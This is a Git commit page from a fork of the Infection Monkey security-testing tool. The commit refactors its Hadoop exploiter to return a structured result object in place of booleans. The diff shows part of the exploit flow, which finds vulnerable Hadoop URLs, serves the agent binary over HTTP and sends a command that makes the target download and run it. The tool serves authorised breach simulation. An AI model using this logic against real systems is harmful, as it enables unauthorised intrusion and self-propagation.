p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Send ExploiterResultData from Hadoop exploiter

This commit is contained in:
Shreya Malviya 2022-02-23 16:33:00 +05:30
parent 90646a6ff9
commit 57eca553a7
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
monkey/infection_monkey/exploit/hadoop.py
View File

@ -41,18 +41,20 @@ class HadoopExploiter(WebRCE):
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
self.add_vulnerable_urls(urls, True) self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls: if not self.vulnerable_urls:
return False return self.exploit_result
paths = self.get_monkey_paths() paths = self.get_monkey_paths()
if not paths: if not paths:
return False return self.exploit_result
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"]) http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
command = self._build_command(paths["dest_path"], http_path) command = self._build_command(paths["dest_path"], http_path)
if not self.exploit(self.vulnerable_urls[0], command): if not self.exploit(self.vulnerable_urls[0], command):
return False return self.exploit_result
http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop() http_thread.stop()
self.add_executed_cmd(command) self.add_executed_cmd(command)
return True self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True
return self.exploit_result
def exploit(self, url, command): def exploit(self, url, command):
# Get the newly created application id # Get the newly created application id